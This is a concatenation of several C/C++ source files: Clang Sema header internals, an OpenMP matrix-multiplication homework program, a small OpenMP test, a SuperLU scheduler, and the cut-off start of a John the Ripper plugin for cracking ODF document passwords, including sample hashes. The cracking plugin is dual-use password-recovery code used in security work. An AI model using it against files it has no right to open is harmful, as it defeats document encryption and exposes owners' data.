/// Retrieve the keyword associated with the given nullability kind.
IdentifierInfo *getNullabilityKeyword(NullabilityKind nullability);
/// The struct behind the CFErrorRef pointer.
RecordDecl *CFError = nullptr;
bool isCFError(RecordDecl *D);
/// Retrieve the identifier "NSError".
IdentifierInfo *getNSErrorIdent();
/// Retrieve the parser's current scope.
///
/// This routine must only be used when it is certain that semantic analysis
/// and the parser are in precisely the same context, which is not the case
/// when, e.g., we are performing any kind of template instantiation.
/// Therefore, the only safe places to use this scope are in the parser
/// itself and in routines directly invoked from the parser and *never* from
/// template substitution or instantiation.
Scope *getCurScope() const { return CurScope; }
void incrementMSManglingNumber() const {
return CurScope->incrementMSManglingNumber();
}
IdentifierInfo *getSuperIdentifier() const;
IdentifierInfo *getFloat128Identifier() const;
Decl *getObjCDeclContext() const;
DeclContext *getCurLexicalContext() const {
return OriginalLexicalContext ? OriginalLexicalContext : CurContext;
}
const DeclContext *getCurObjCLexicalContext() const {
const DeclContext *DC = getCurLexicalContext();
// A category implicitly has the attribute of the interface.
if (const ObjCCategoryDecl *CatD = dyn_cast<ObjCCategoryDecl>(DC))
DC = CatD->getClassInterface();
return DC;
}
/// Determine the number of levels of enclosing template parameters. This is
/// only usable while parsing. Note that this does not include dependent
/// contexts in which no template parameters have yet been declared, such as
/// in a terse function template or generic lambda before the first 'auto' is
/// encountered.
unsigned getTemplateDepth(Scope *S) const;
/// To be used for checking whether the number of arguments being passed
/// to a function exceeds the number of parameters it expects.
static bool TooManyArguments(size_t NumParams, size_t NumArgs,
bool PartialOverloading = false) {
// We check whether we're just after a comma in code-completion.
if (NumArgs > 0 && PartialOverloading)
return NumArgs + 1 > NumParams; // If so, we view as an extra argument.
return NumArgs > NumParams;
}
// Emitting members of dllexported classes is delayed until the class
// (including field initializers) is fully parsed.
SmallVector<CXXRecordDecl*, 4> DelayedDllExportClasses;
SmallVector<CXXMethodDecl*, 4> DelayedDllExportMemberFunctions;
private:
int ParsingClassDepth = 0;
class SavePendingParsedClassStateRAII {
public:
SavePendingParsedClassStateRAII(Sema &S) : S(S) { swapSavedState(); }
~SavePendingParsedClassStateRAII() {
assert(S.DelayedOverridingExceptionSpecChecks.empty() &&
"there shouldn't be any pending delayed exception spec checks");
assert(S.DelayedEquivalentExceptionSpecChecks.empty() &&
"there shouldn't be any pending delayed exception spec checks");
swapSavedState();
}
private:
Sema &S;
decltype(DelayedOverridingExceptionSpecChecks)
SavedOverridingExceptionSpecChecks;
decltype(DelayedEquivalentExceptionSpecChecks)
SavedEquivalentExceptionSpecChecks;
void swapSavedState() {
SavedOverridingExceptionSpecChecks.swap(
S.DelayedOverridingExceptionSpecChecks);
SavedEquivalentExceptionSpecChecks.swap(
S.DelayedEquivalentExceptionSpecChecks);
}
};
/// Helper class that collects misaligned member designations and
/// their location info for delayed diagnostics.
struct MisalignedMember {
Expr *E;
RecordDecl *RD;
ValueDecl *MD;
CharUnits Alignment;
MisalignedMember() : E(), RD(), MD(), Alignment() {}
MisalignedMember(Expr *E, RecordDecl *RD, ValueDecl *MD,
CharUnits Alignment)
: E(E), RD(RD), MD(MD), Alignment(Alignment) {}
explicit MisalignedMember(Expr *E)
: MisalignedMember(E, nullptr, nullptr, CharUnits()) {}
bool operator==(const MisalignedMember &m) { return this->E == m.E; }
};
/// Small set of gathered accesses to potentially misaligned members
/// due to the packed attribute.
SmallVector<MisalignedMember, 4> MisalignedMembers;
/// Adds an expression to the set of gathered misaligned members.
void AddPotentialMisalignedMembers(Expr *E, RecordDecl *RD, ValueDecl *MD,
CharUnits Alignment);
public:
/// Diagnoses the current set of gathered accesses. This typically
/// happens at full expression level. The set is cleared after emitting the
/// diagnostics.
void DiagnoseMisalignedMembers();
/// This function checks if the expression is in the set of potentially
/// misaligned members and is converted to some pointer type T with lower
/// or equal alignment requirements. If so, it removes it. This is used when
/// we do not want to diagnose such misaligned access (e.g. in conversions to
/// void*).
void DiscardMisalignedMemberAddress(const Type *T, Expr *E);
/// This function calls Action when it determines that E designates a
/// misaligned member due to the packed attribute. This is used to emit
/// local diagnostics like in reference binding.
void RefersToMemberWithReducedAlignment(
Expr *E,
llvm::function_ref<void(Expr *, RecordDecl *, FieldDecl *, CharUnits)>
Action);
/// Describes the reason a calling convention specification was ignored, used
/// for diagnostics.
enum class CallingConventionIgnoredReason {
ForThisTarget = 0,
VariadicFunction,
ConstructorDestructor,
BuiltinFunction
};
};
/// RAII object that enters a new expression evaluation context.
class EnterExpressionEvaluationContext {
Sema &Actions;
bool Entered = true;
public:
EnterExpressionEvaluationContext(
Sema &Actions, Sema::ExpressionEvaluationContext NewContext,
Decl *LambdaContextDecl = nullptr,
Sema::ExpressionEvaluationContextRecord::ExpressionKind ExprContext =
Sema::ExpressionEvaluationContextRecord::EK_Other,
bool ShouldEnter = true)
: Actions(Actions), Entered(ShouldEnter) {
if (Entered)
Actions.PushExpressionEvaluationContext(NewContext, LambdaContextDecl,
ExprContext);
}
EnterExpressionEvaluationContext(
Sema &Actions, Sema::ExpressionEvaluationContext NewContext,
Sema::ReuseLambdaContextDecl_t,
Sema::ExpressionEvaluationContextRecord::ExpressionKind ExprContext =
Sema::ExpressionEvaluationContextRecord::EK_Other)
: Actions(Actions) {
Actions.PushExpressionEvaluationContext(
NewContext, Sema::ReuseLambdaContextDecl, ExprContext);
}
enum InitListTag { InitList };
EnterExpressionEvaluationContext(Sema &Actions, InitListTag,
bool ShouldEnter = true)
: Actions(Actions), Entered(false) {
// In C++11 onwards, narrowing checks are performed on the contents of
// braced-init-lists, even when they occur within unevaluated operands.
// Therefore we still need to instantiate constexpr functions used in such
// a context.
if (ShouldEnter && Actions.isUnevaluatedContext() &&
Actions.getLangOpts().CPlusPlus11) {
Actions.PushExpressionEvaluationContext(
Sema::ExpressionEvaluationContext::UnevaluatedList);
Entered = true;
}
}
~EnterExpressionEvaluationContext() {
if (Entered)
Actions.PopExpressionEvaluationContext();
}
};
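// Example usage (a sketch; S is an assumed Sema instance):
//
//   {
//     EnterExpressionEvaluationContext Unevaluated(
//         S, Sema::ExpressionEvaluationContext::Unevaluated);
//     // ... build or check an unevaluated operand ...
//   } // the evaluation context is popped here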
DeductionFailureInfo
MakeDeductionFailureInfo(ASTContext &Context, Sema::TemplateDeductionResult TDK,
sema::TemplateDeductionInfo &Info);
/// Contains a late templated function.
/// Will be parsed at the end of the translation unit, used by Sema & Parser.
struct LateParsedTemplate {
CachedTokens Toks;
/// The template function declaration to be late parsed.
Decl *D;
};
} // end namespace clang
namespace llvm {
// Hash a FunctionDeclAndLoc by looking at both its FunctionDecl and its
// SourceLocation.
template <> struct DenseMapInfo<clang::Sema::FunctionDeclAndLoc> {
using FunctionDeclAndLoc = clang::Sema::FunctionDeclAndLoc;
using FDBaseInfo = DenseMapInfo<clang::CanonicalDeclPtr<clang::FunctionDecl>>;
static FunctionDeclAndLoc getEmptyKey() {
return {FDBaseInfo::getEmptyKey(), clang::SourceLocation()};
}
static FunctionDeclAndLoc getTombstoneKey() {
return {FDBaseInfo::getTombstoneKey(), clang::SourceLocation()};
}
static unsigned getHashValue(const FunctionDeclAndLoc &FDL) {
return hash_combine(FDBaseInfo::getHashValue(FDL.FD),
FDL.Loc.getRawEncoding());
}
static bool isEqual(const FunctionDeclAndLoc &LHS,
const FunctionDeclAndLoc &RHS) {
return LHS.FD == RHS.FD && LHS.Loc == RHS.Loc;
}
};
} // namespace llvm
#endif
|
prog1.c | /*
Copyright (c) 2017 Rob Gillen
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
*/
#include <stdio.h>
#include <stdlib.h>
#include <error.h>
#include <argp.h>
#include <inttypes.h>
#include <time.h>
#include <omp.h>
const char *argp_program_version = "prog1 1.0";
const char *argp_program_bug_address = "<regillen42@students.tntech.edu>";
/* Program documentation. */
static char doc[] = "CSC6740 Assignment 1 -- Matrix Multiplication with OpenMP";
/* The options we understand. */
static struct argp_option options[] = {
{"size", 's', "SIZE", 0, "Size of a matrix side (e.g. M x M)"},
{"threads", 't', "THREADS", 0, "Number of threads to utilize"},
{ 0 }  // argp requires the option vector to be zero-terminated
};
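// Example invocation (hypothetical binary name "prog1"):
//   ./prog1 --size 512 --threads 8     (equivalently: ./prog1 -s 512 -t 8)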
// hold our command line arguments
struct arguments {
int matrix_size;
int thread_count;
};
// my parser function
static error_t parse_opt (int key, char *arg, struct argp_state *state)
{
struct arguments *arguments = state->input;
switch (key)
{
case 's':
arguments->matrix_size = arg ? atoi (arg) : 10;
break;
case 't':
arguments->thread_count = arg ? atoi (arg) : 10;
break;
default:
return ARGP_ERR_UNKNOWN;
}
return 0;
}
// my argp parser
static struct argp argp = { options, parse_opt, 0, doc };
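// Returns a pseudo-random double uniformly distributed in [0, 1024].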
double build_good_random() {
return ((double)rand()/(double)(RAND_MAX)) * 1024;
}
int main(int argc, char **argv) {
struct arguments arguments;
arguments.matrix_size = 0;
arguments.thread_count = 0;
argp_parse(&argp, argc, argv, 0, 0, &arguments);
printf("\n");
printf("***********************************************\n");
printf("* Matrix Math with OpenMP\n");
printf("* \n");
printf("* Using %i threads\n", arguments.thread_count);
printf("* Matrix size: %i x %i\n", arguments.matrix_size, arguments.matrix_size);
printf("*\n\n");
if ((arguments.matrix_size <= 0) || (arguments.thread_count <= 0)) {
fprintf(stderr, "\n[ERROR] You must specify a matrix size and thread count greater than zero\n");
exit(1);
}
// generate the matrices (e.g. 10x10 should be double[100], and in row-major format)
size_t total_size = (size_t)arguments.matrix_size * (size_t)arguments.matrix_size;
double *m1 = malloc (sizeof(double)*total_size);
double *m2 = malloc (sizeof(double)*total_size);
double *a1 = malloc (sizeof(double)*total_size);
double *a2 = malloc (sizeof(double)*total_size);
// double m1[9];
// double m2[9];
// double a1[9];
// double a2[9];
// m1[0] = 1;
// m1[1] = 2;
// m1[2] = 3;
// m1[3] = 4;
// m1[4] = 5;
// m1[5] = 6;
// m1[6] = 7;
// m1[7] = 8;
// m1[8] = 9;
// m2[0] = 9;
// m2[1] = 8;
// m2[2] = 7;
// m2[3] = 6;
// m2[4] = 5;
// m2[5] = 4;
// m2[6] = 3;
// m2[7] = 2;
// m2[8] = 1;
for (int i = 0; i < arguments.matrix_size*arguments.matrix_size; i++) {
m1[i] = build_good_random();
m2[i] = build_good_random();
}
// print the matrix (row major)
// printf("MATRIX #1\n");
// for (int i = 0; i < arguments.matrix_size; i++) {
// for (int j = 0; j < arguments.matrix_size; j++) {
// int index = (arguments.matrix_size * i) + j;
// printf("%f\t", m1[index]);
// }
// printf("\n");
// }
// printf("\nMATRIX #2\n");
// for (int i = 0; i < arguments.matrix_size; i++) {
// for (int j = 0; j < arguments.matrix_size; j++) {
// int index = (arguments.matrix_size * i) + j;
// printf("%f\t", m2[index]);
// }
// printf("\n");
// }
int side_len = arguments.matrix_size;
// ok... let's do it the hard way...
// printf("Running Serial Calculations\n");
// // double counter = 0;
// for (int i = 0; i < side_len; i++) {
// for (int j = 0; j < side_len; j++) {
// double answer = 0;
// for (int k = 0; k < side_len; k++) {
// answer += m1[(side_len*i) + k] * m2[(side_len*k) + j];
// }
// a1[(side_len*i) + j] = answer;
// }
// }
printf("Running Parallel Calculations\n");
// set the number of threads
omp_set_num_threads(arguments.thread_count);
// set up the parallel branch
#pragma omp parallel
{
// calculate the range (into i) for this particular thread
int ID = omp_get_thread_num();
int split = side_len / arguments.thread_count;
int min = split * ID;
// the last thread also takes the remainder rows when side_len is not
// evenly divisible by the thread count
int max = (ID == arguments.thread_count - 1) ? side_len : min + split;
// printf("MIN for %d: %d\n", ID, min);
// printf("MAX for %d: %d\n", ID, max);
// do it just like before, but only our part (data parallel)
for (int i = min; i < max; i++) {
for (int j = 0; j < side_len; j++) {
double answer = 0;
for (int k = 0; k < side_len; k++) {
answer += m1[(side_len*i) + k] * m2[(side_len*k) + j];
}
a1[(side_len*i) + j] = answer;
}
}
}
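// An equivalent decomposition, shown only as a sketch: let OpenMP split
// the row loop itself instead of computing per-thread [min, max) ranges
// by hand. Disabled so the hand-rolled version above remains the one
// that runs.
#if 0
#pragma omp parallel for
for (int i = 0; i < side_len; i++) {
for (int j = 0; j < side_len; j++) {
double answer = 0;
for (int k = 0; k < side_len; k++) {
answer += m1[(side_len*i) + k] * m2[(side_len*k) + j];
}
a1[(side_len*i) + j] = answer;
}
}
#endif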
// printf("\nRESULTS\n");
// for (int i = 0; i < arguments.matrix_size; i++) {
// for (int j = 0; j < arguments.matrix_size; j++) {
// int index = (arguments.matrix_size * i) + j;
// printf("%f\t", a1[index]);
// }
// printf("\n");
// }
// printf("\n%0.0f total operations\n", counter);
printf("\n");
free(m1);
free(m2);
free(a1);
free(a2);
exit (0);
}
|
CriticalEndLink.c | /* Minimal test case: two consecutive anonymous critical
   regions, one whose body is a no-effect expression statement and one
   containing only a local declaration. */
int x;
int main () {
#pragma omp critical
{
11; /* expression statement with no effect; the region just needs a body */
}
#pragma omp critical
{
int x; /* local x shadows the file-scope x above */
}
}
|
pxgstrf_scheduler.c | /*! \file
Copyright (c) 2003, The Regents of the University of California, through
Lawrence Berkeley National Laboratory (subject to receipt of any required
approvals from U.S. Dept. of Energy)
All rights reserved.
The source code is distributed under BSD license, see the file License.txt
at the top-level directory.
*/
#include "slu_mt_ddefs.h"
void
pxgstrf_scheduler(const int_t pnum, const int_t n, const int_t *etree,
int_t *cur_pan, int_t *bcol, pxgstrf_shared_t *pxgstrf_shared)
{
/*
* -- SuperLU MT routine (version 1.0) --
* Univ. of California Berkeley, Xerox Palo Alto Research Center,
* and Lawrence Berkeley National Lab.
* August 15, 1997
*
* Purpose
* =======
*
* pxgstrf_scheduler() gets a panel for the processor to work on.
* It schedules a panel in decreasing order of priority:
* (1) the current panel's parent, if it can be done without pipelining
* (2) any other panel in the queue that can be done without pipelining
* ("CANGO" status)
* (3) any other panel in the queue that can be done with pipelining
* ("CANPIPE" status)
*
* Arguments
* =========
* pnum (input) int_t
* Processor number.
*
* n (input) int_t
* Column dimension of the matrix.
*
* etree (input) int_t*
* Elimination tree of A'*A, size n.
* Note: etree is a vector of parent pointers for a forest whose
* vertices are the integers 0 to n-1; etree[root] = n.
*
* cur_pan (input/output) int_t*
* On entry, the current panel just finished by this processor;
* On exit, [0, n-1]: the new panel to work on;
* EMPTY: failed to get any work, will try later;
* n: all panels are taken; ready to terminate.
*
* taskq (input/output) queue_t*
* Global work queue.
*
* fb_cols (input/output) int_t*
* The farthest busy descendant of each (leading column of the) panel.
*
* bcol (output) int_t*
* The most distant busy descendant of cur_pan in the *linear*
* pipeline of busy descendants. If all proper descendants of
* cur_pan are done, bcol is returned equal to cur_pan.
*
* Defining terms
* ==============
* o parent(panel) = etree(last column in the panel)
* o the kids of a panel = collective kids of all columns in the panel
* kids[REP] = SUM_{j in panel} ( kids[j] )
* o linear pipeline - what does it mean in the panel context?
* if ukids[REP] = 0, then the panel becomes a leaf (CANGO)
* if ukids[REP] = 1 && ukids[firstcol] = 1, then the panel can
* be taken with pipelining (CANPIPE)
*
* NOTES
* =====
* o When a "busy" panel finishes, if its parent has only one remaining
* undone child there is no check to see if the parent should change
* from "unready" to "canpipe". Thus a few potential pipelinings will
* be lost, but checking out this pipeline opportunity may be costly.
*
*/
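/*
 * Worked example of the parent-pointer convention (illustrative only):
 * with n = 4 and etree = {1, 3, 3, 4}, column 0 is a child of column 1,
 * columns 1 and 2 are children of column 3, and etree[3] = n marks
 * column 3 as a root of the forest.
 */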
register int_t dad, dad_ukids, jcol, w, j;
int_t *fb_cols = pxgstrf_shared->fb_cols;
queue_t *taskq = &pxgstrf_shared->taskq;
Gstat_t *Gstat = pxgstrf_shared->Gstat;
#ifdef PROFILE
double t;
#endif
jcol = *cur_pan;
if ( jcol != EMPTY ) {
#ifdef DOMAINS
if ( in_domain[jcol] == TREE_DOMAIN )
dad = etree[jcol];
else
#endif
dad = DADPANEL (jcol);
}
/* w_top = sp_ienv(1)/2;
if ( w_top == 0 ) w_top = 1;*/
#ifdef PROFILE
TIC(t);
#endif
#if ( MACH==SUN )
mutex_lock( &pxgstrf_shared->lu_locks[SCHED_LOCK] );
#elif ( MACH==DEC || MACH==PTHREAD )
pthread_mutex_lock( &pxgstrf_shared->lu_locks[SCHED_LOCK] );
#elif ( MACH==SGI || MACH==ORIGIN )
#pragma critical lock(pxgstrf_shared->lu_locks[SCHED_LOCK])
#elif ( MACH==CRAY_PVP )
#pragma _CRI guard SCHED_LOCK
#elif ( MACH==OPENMP )
#pragma omp critical ( SCHED_LOCK )
#endif
{ /* ---- START CRITICAL SECTION ---- */
/* Update the status of the current panel and its parent, so that
* the other processors waiting on it can proceed.
* If all siblings are done, and dad is not busy, then take dad.
*/
if ( jcol != EMPTY ) { /* jcol was just finished by this processor */
dad_ukids = --pxgstrf_shared->pan_status[dad].ukids;
#if ( DEBUGlevel>=1 )
printf("(%d) DONE %d in Scheduler(), dad %d, STATE %d, dad_ukids %d\n",
pnum, jcol, dad, STATE(dad), dad_ukids);
#endif
if ( dad_ukids == 0 && STATE( dad ) > BUSY ) { /* dad not started */
jcol = dad;
#if ( DEBUGlevel>=1 )
printf("(%d) Scheduler[1] Got dad %d, STATE %d\n",
pnum, jcol, STATE(dad));
#endif
#ifdef PROFILE
++(Gstat->panhows[DADPAN]);
#endif
} else {
/* Try to get a panel from the task Q. */
while ( 1 ) {
/*>>if ( (j = Dequeue(taskq, &item)) == EMPTY ) {*/
if ( taskq->count <= 0 ) {
jcol = EMPTY;
break;
} else {
jcol = taskq->queue[taskq->head++];
--taskq->count;
if ( STATE( jcol ) >= CANGO ) { /* CANGO or CANPIPE */
#if ( DEBUGlevel>=1 )
printf("(%d) Dequeue[1] Got %d, STATE %d, Qcount %d\n",
pnum, jcol, STATE(jcol), j);
#endif
#ifdef PROFILE
if (STATE( jcol ) == CANGO) ++(Gstat->panhows[NOPIPE]);
else ++(Gstat->panhows[PIPE]);
#endif
break;
}
}
} /* while */
}
} else {
/*
* jcol was EMPTY; Try to get a panel from the task Q.
*/
while ( 1 ) {
/*>>if ( (j = Dequeue(taskq, &item)) == EMPTY ) {*/
if ( taskq->count <= 0 ) {
jcol = EMPTY;
break;
} else {
jcol = taskq->queue[taskq->head++];
--taskq->count;
if ( STATE( jcol ) >= CANGO ) { /* CANGO or CANPIPE */
#if ( DEBUGlevel>=1 )
printf("(%d) Dequeue[2] Got %d, STATE %d, Qcount %d\n",
pnum, jcol, STATE(jcol), j);
#endif
#ifdef PROFILE
if (STATE( jcol ) == CANGO) ++(Gstat->panhows[NOPIPE]);
else ++(Gstat->panhows[PIPE]);
#endif
break;
}
}
} /* while */
}
/*
* Update the status of the new panel "jcol" and its parent "dad".
*/
if ( jcol != EMPTY ) {
--pxgstrf_shared->tasks_remain;
#ifdef DOMAINS
if ( in_domain[jcol] == TREE_DOMAIN ) {
/* Dequeue the first descendant of this domain */
*bcol = taskq->queue[taskq->head++];
--taskq->count;
} else
#endif
{
STATE( jcol ) = BUSY;
w = pxgstrf_shared->pan_status[jcol].size;
for (j = jcol; j < jcol+w; ++j) pxgstrf_shared->spin_locks[j] = 1;
dad = DADPANEL (jcol);
if ( dad < n && pxgstrf_shared->pan_status[dad].ukids == 1 ) {
STATE( dad ) = CANPIPE;
/*>> j = Enqueue(taskq, dad);*/
taskq->queue[taskq->tail++] = dad;
++taskq->count;
#if ( DEBUGlevel>=1 )
printf("(%d) Enqueue() %d's dad %d ->CANPIPE, Qcount %d\n",
pnum, jcol, dad, j);
#endif
}
#ifdef PROFILE
Gstat->procstat[pnum].panels++;
#endif
/* Find the farthest busy descendant of the new panel
and its parent.*/
*bcol = fb_cols[jcol];
#if ( DEBUGlevel>=1 )
printf("(%d) Scheduler[2] fb_cols[%d]=%d, STATE %d\n",
pnum, jcol, *bcol, STATE( *bcol ));
#endif
while ( STATE( *bcol ) == DONE ) *bcol = DADPANEL (*bcol);
fb_cols[dad] = *bcol;
} /* else regular_panel */
} /* if jcol != empty */
*cur_pan = jcol;
#if ( DEBUGlevel>=1 )
printf("(%d) Exit C.S. tasks_remain %d, cur_pan %d\n",
pnum, pxgstrf_shared->tasks_remain, jcol);
#endif
} /* ---- END CRITICAL SECTION ---- */
#if ( MACH==SUN )
/* Exit C.S. */
mutex_unlock( &pxgstrf_shared->lu_locks[SCHED_LOCK] );
#elif ( MACH==DEC || MACH==PTHREAD )
pthread_mutex_unlock( &pxgstrf_shared->lu_locks[SCHED_LOCK] );
#elif ( MACH==CRAY_PVP )
#pragma _CRI endguard SCHED_LOCK
#endif
#ifdef PROFILE
Gstat->procstat[pnum].cs_time += SuperLU_timer_() - t;
#endif
return;
}
/* @@@@@@@@@@@@@@ not called @@@@@@@@@@@@@@@@@@ */
#if 0
/* Fix the order of the panels to be taken. */
void
Preorder(const int_t pnum, const int_t n, const int_t *etree, int_t *cur_pan,
queue_t *taskq, int_t *fb_cols, int_t *bcol,
pxgstrf_shared_t *pxgstrf_shared)
{
register int_t w, dad, dad_ukids;
#undef POSTORDER
#ifdef POSTORDER
if ( *cur_pan == EMPTY ) {
*cur_pan = 0;
} else {
w = pxgstrf_shared->pan_status[*cur_pan].size;
*cur_pan += w;
}
#else /* Breadth-first bottom up */
if ( *cur_pan != EMPTY ) {
dad = DADPANEL (*cur_pan);
dad_ukids = --pxgstrf_shared->pan_status[dad].ukids;
if ( dad_ukids == 0 ) {
taskq->queue[taskq->tail++] = dad;
++taskq->count;
}
}
*cur_pan = taskq->queue[taskq->head++];
--taskq->count;
#endif
--pxgstrf_shared->tasks_remain;
*bcol = *cur_pan;
}
#endif
/* @@@@@@@@@@@@@@ not called @@@@@@@@@@@@@@@@@@ */
|
opencl_odf_fmt_plug.c | /* Modified by Dhiru Kholia <dhiru at openwall.com> for ODF Blowfish format.
*
* This software is Copyright (c) 2012 Lukas Odzioba <ukasz@openwall.net>
* and it is hereby released to the general public under the following terms:
* Redistribution and use in source and binary forms, with or without
* modification, are permitted. */
#ifdef HAVE_OPENCL
#if FMT_EXTERNS_H
extern struct fmt_main fmt_opencl_odf;
#elif FMT_REGISTERS_H
john_register_one(&fmt_opencl_odf);
#else
#include <string.h>
#include "sha.h"
#include <openssl/blowfish.h>
#include "aes.h"
#ifdef _OPENMP
#include <omp.h>
#endif
#include "arch.h"
#include "formats.h"
#include "common.h"
#include "stdint.h"
#include "misc.h"
#include "options.h"
#include "common.h"
#include "formats.h"
#include "common-opencl.h"
#define FORMAT_LABEL "ODF-opencl"
#define FORMAT_NAME ""
#define ALGORITHM_NAME "SHA1 OpenCL Blowfish"
#define BENCHMARK_COMMENT ""
#define BENCHMARK_LENGTH -1
#define MIN_KEYS_PER_CRYPT 1
#define MAX_KEYS_PER_CRYPT 1
#define BINARY_SIZE 20
#define PLAINTEXT_LENGTH 64
#define SALT_SIZE sizeof(odf_cpu_salt)
#define BINARY_ALIGN MEM_ALIGN_WORD
#define SALT_ALIGN 4
typedef struct {
uint32_t length;
uint8_t v[20]; // hash of password
} odf_password;
typedef struct {
uint32_t v[32/4];
} odf_hash;
typedef struct {
uint32_t iterations;
uint32_t outlen;
uint32_t skip_bytes;
uint8_t length;
uint8_t salt[64];
} odf_salt;
static char (*saved_key)[PLAINTEXT_LENGTH + 1];
static ARCH_WORD_32 (*crypt_out)[32 / sizeof(ARCH_WORD_32)];
typedef struct {
int cipher_type;
int checksum_type;
int iterations;
int key_size;
int iv_length;
int salt_length;
int content_length;
unsigned char iv[16];
unsigned char salt[32];
unsigned char content[1024];
} odf_cpu_salt;
static odf_cpu_salt *cur_salt;
static struct fmt_tests odf_tests[] = {
{"$odf$*0*0*1024*16*df6c10f64d191a841812af53874b636d014ce3fe*8*07e28aff39d2660e*16*b124be9f3346fb77e0ebcc3bb80028f8*0*2276a1077f6a2a027bd565ce89824d6a20086e378876be05c4b8e3796a460e828c9803a692caf7a53492c220d1d7ecbf4e2d336c7abf5a7672acc804ca267318252cbc13676616d1fde38820f9fbeef1360067d9de096ba8c1032ae947bde1d0fedaf37b6020663d49faf36b7c095c5b9aae11c8fc2be74148f008edbdbb180b44028ad8259f1215b483542bf3027f56dee5f962448333b30f88e6ae4790b60d24abb286edff9adee831a4b3351fc47259043f0d683d7a25be7e47aff3aedca140005d866e218c8efcca32093c19bbece50bd96656d0f94a712d3c60d1e5342db86482fc73f05faf513ca0b137378126597b95986c372b412c953e97011259aab0839fe453c756559497a28ba88dce009e1e7980436131029d38e56a34f608e6471970d9959068808c898608024db9eb394c4feae7a364ea9272ec4ea2315a9f0407a4b27d5e49a8ab1e3ddce5c84927d5aecd7e68e4437a820ea8743c6b5b4e2abbb47b0001e2f77ceac4603e8774e4ccbc1adde794428c11ae4a7492727b620334302e63f72b0c06c1cf83800366916ee8295176819272d557863a831ee0a576841191482959aad69095831fa1d64e3e0e6f6c6a751bcdadf0fbaa27a17458709f708c04587cb208984c9525da6786e0e5aabefe30ad1dbbef66e85ce9d6dbe456fd85e4135de5cf16d9455976d7ca8de7b1b530661c74c0fae90c0fff1a2b5fcdfab19fcff75fadcec445ed8af6ab5babf1463e08458918be8045083de6db988c37e4be582cfac5cdf741d1f0322fb2902665c7ff347813348109e5d442e91fcb010c28f042da481e807084fcb4759b40ccf2cae77bad00cdfbfba4acf36aa1f74c30a315e3d7f1ca522b6306e8903352aafa51dc523d582d418934398d5eb88120e3656bfb640a239db507b285302a86855ea850ddc9af72fc62dc79336c9bc29ee8314c65adb0574e9c701d73d7fa977edd1d52a1ff2da5b8b94e1a0fdd01ffcc6583758f0a1f51750e45f12b58c6d38b140e5676cf3474224520ef7c52ca5e634f85456651f3d6f43d016ed7cc5da54ea640a3bc50c2b9d3dea8f93c0340d66ccd06efc5ae002108c33cf3a470c4a50f6a6ca2f11b8ad15511688c282b94ba6f1c332e239d10946dc46f763f08d12cb9edc1e79c0e07f7151f548e6d7d20ec13b52d911bf980cac60694e192651403c9a69abea045190e847be093fc9ba43fec55b32f77f5796ddca25b441f259d5c51e06df6c6588c6414899481ba9e06bcebec58f82ff3021b09c6beae13a5d22bc94870f72ab813d0c0be01d91f3d075192e7a5de765599d72244757d09539529a8347e077a36678166e5ed9f73a5aad2e147d8154095c397e3e5e4ba1987ca64c1301a0c6c3e438097ede9b701a105ec38fcb54abb31b367c7740cd9ac459e561094a34f01acee555e60267157e6", "test"},
{"$odf$*0*0*1024*16*43d3dbd907785c4fa5282a2e73a5914db3372505*8*b3d676d4519e6b5a*16*34e3f7fdfa67fb0078360b0df4011270*0*7eff7a7abf1e6b0c4a9fafe6bdcfcfeaa5b1886592a52bd255f1b51096973d6fa50d792c695f3ef82c6232ae7f89c771e27db658258ad029e82415962b270d2c859b0a3efb231a0519ec1c807082638a9fad7537dec22e20d59f2bfadfa84dd941d59dd07678f9e60ffcc1eb27d8a2ae47b616618e5e80e27309cd027724355bf78b03d5432499c1d2a91d9c67155b7f49e61bd8405e75420d0cfb9e64b238623a9d8ceb47a3fdb5e7495439bb96e79882b850a0c8d3c0fbef5e6d425ae359172b9a82ec0566c3578a9f07b86a70d75b5ad339569c1c8f588143948d63bdf88d6ed2e751ac07f25ecc5778dc06247e5a9edca869ee3335e5dae351666a618d00ec05a35bc73d330bef12a46fb53b2ff96e1b2919af4e692730b9c9664aca761df10d6cf55396c4d4c268e6e96c96515c527c8fe2716ac7a9f016941aa46e6b03e8a5069c29ec8e8614b7da3e2e154a77510393051a0b693ae40da6afb5712a4ce4ac0ebacda1f45bdccc8a7b21e153d1471665cae3205fbfa00129bf00c06777bfecba2c43a1481a00111b4f0bd30c2378bd1e2e219700406411c6f897a3dfa51b31613cb241d56b68f3c241428783b353be26fa8b2df68ca215d1cf892c10fdef94faf2381a13f8cb2bce1a7dbb7522ef0b2a83e5a96ca66417fd2928784054e80d74515c1582ad356dd865837b5ea90674a30286a72a715f621c9226f19a321b413543fbbdb7cd9d1f99668b19951304e7267554d87992fbf9a96116601d0cee9e23cb22ba474c3f721434400cacf15bae05bbe9fa17f69967d03689c48a26fa57ff9676c96767762f2661b6c8f8afa4f96f989086aa02b6f8d039c6f4d158cc33a56cbf77640fb5087b2d5a5251692bb9255d0ae8148c7157c40031fdb0ea90d5fab546a7e1e1c15bd6a27f3716776c8a3fdbdd4f34c19fef22c36117c124876606b1395bf96266d647aaf5208eefd729a42a4efe42367475315a979fb74dcb9cd30917a811ed8283f2b111bb5a5d2b0f5589b3652f17d23e352e1494f231027bb93209e3c6a0388f8b2214577dca8aa9d705758aa334d6947491488770ed8066f692f8922ff0d852c2d0f965ab3d8a13c6de0ef3cff5a15ee7b64f9b1003817f0cb919ad021d5f3b0b5c1ad58db22e8fbd63abfb40e61065bad008cdffbbe3c563780a548f4515df5c935d9aa2a3033bc8a4011c9c173a0366c9b7b07f2a27de0e55373fb4b0c7726997be6f410a2ee5980393ea005516e89538be796131e450403420d72cdbd75475fd11c50efce5eb340d55d2dd0a67ca45ddb53aa582a2ec56b46452e26a505